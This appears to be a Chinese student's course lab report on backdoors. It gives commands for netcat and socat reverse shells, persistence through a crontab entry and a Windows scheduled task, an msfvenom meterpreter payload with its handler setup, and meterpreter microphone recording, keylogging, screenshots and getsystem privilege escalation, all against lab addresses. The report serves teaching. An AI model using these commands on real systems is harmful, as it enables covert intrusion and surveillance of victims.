2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

一、实验内容 (3.5分)

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:在一些网站下载应用程序时,该应用程序可能绑定了一些可执行文件,留下后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:Linux可以通过crontab功能将木马设为定时启动或通过对正常软件的绑定注入shellcode达到开启后门的目的。

(3)Meterpreter有哪些给你映像深刻的功能?

答:植入后门实施远程控制、metsvc后渗透攻击模块等等。

(4)如何发现自己有系统有没有被安装后门?

答:查看是否有IP与本机建立连接;安装专门的杀毒软件,定期检测电脑安全情况等等。

二、实验具体步骤

实验一

任务一 使用netcat获取主机操作Shell

1、在Windows下打开命令行,查看Windows的ip地址为:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、使用ncat.exe程序打开监听ncat.exe -l -p 5236:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、在kali中反弹连接Windows,nc 172.30.0.142 5236 -e /bin/sh:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

4、Windows成功获得kali的shell,如图所示:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

任务二  Linux获得Windows Shell

1、在Kali环境中使用ifconfig查看ip:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、使用nc指令监听5236端口:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、在Windows中反弹连接kali,输入ncat.exe -e cmd.exe 172.30.5.29 5236,

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

4、kali成功获得Windows的命令提示,输入Windows命令:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

任务三  使用nc传输数据

1、Windows下监听5236端口:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、Kali下连接到Windows的5236端口,nc 192.168.43.44 5236,

3、建立连接,传输数据,但这个过程中我遇到了点问题如下,但是查阅相关资料后目前还未解决:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

实验二

任务一  使用netcat获取主机操作Shell,cron启动

1、在Windows系统下,监听5236端口:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、用crontab -e指令编辑一条定时任务,选择编辑器选择3,在底行插入04 * * * * /bin/netcat 172.30.0.142 5236 -e /bin/sh,

意思是每个小时的第4分钟反向连接Windows的5236端口:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、保存退出后输入crontab -l 即可查看:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

4、在系统时间到第4分钟,就会在Windows中监听的cmd中发现获得Linux shell:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

任务二 使用socat获取主机操作Shell, 任务计划启动

1、控制面板中打开系统与安全,选择任务计划程序并创建任务,

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、常规中填写任务名称学号:20165236,新建触发器 ,选择:工作站锁定时:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、点击操作,在程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5236 exec:cmd.exe,pty,stderr:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

4、创建完成之后,按Windows+L锁定计算机,再次打开,之前创建的任务已经开始运行:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

5、在Kali-Linux中输入指令socat - tcp:172.30.0.142:5236:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、在kali中输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.0.142 LPORT=5236 -f exe > 20165236_backdoor.exe,

生成后门程序:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、在Windows中输入:nc.exe -l 5236 > 20165236_backdoor.exe :

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、Linux中执行nc 172.30.0.142 5236 < backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP,

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

4、在Windows的ncat文件夹下查看后门程序,如图所示,文件传输成功:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

5、在Kali中打开一个终端,使用msfconsole指令进入msf控制台:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

6、接着输入use exploit/multi/handler使用监听模块,设置payload;

7、set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8、set LHOST 172.30.0.142,这里用的是LinuxIP,和生成后门程序时指定的IP相同;

9、set LPORT 5236,同样要使用相同的端口:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

这里出了点问题,目前尚未解决:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

任务四  

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

2、 使用screenshot指令可以进行截屏:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

3、使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

4、使用getuid指令查看当前用户,或getsystem指令进行提权等等:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

三、实验过程中遇到的问题

1、如图所示:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

询问同学后得知解决方法为:双击后再运行。

2、在Kali中使用msfconsole指令进入msf控制台后,出现如下界面:

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践-LMLPHP

原因是后台程序过多,内存不够;

解决方法:关闭虚拟机,将内存调高后重启虚拟机。

四、实验体会

本次实验为网络对抗第二次实验,相对于第一次实验内容较多,过程也较为复杂。其中也出现许多新的知识,以及许多我不太懂的地方。

在询问老师同学和查阅资料后这些问题也一一解决了,并且顺利完成了本次实验。虽然实验过程中存在许多困难,但我依然从中收获了许多新知识。

04-25 05:57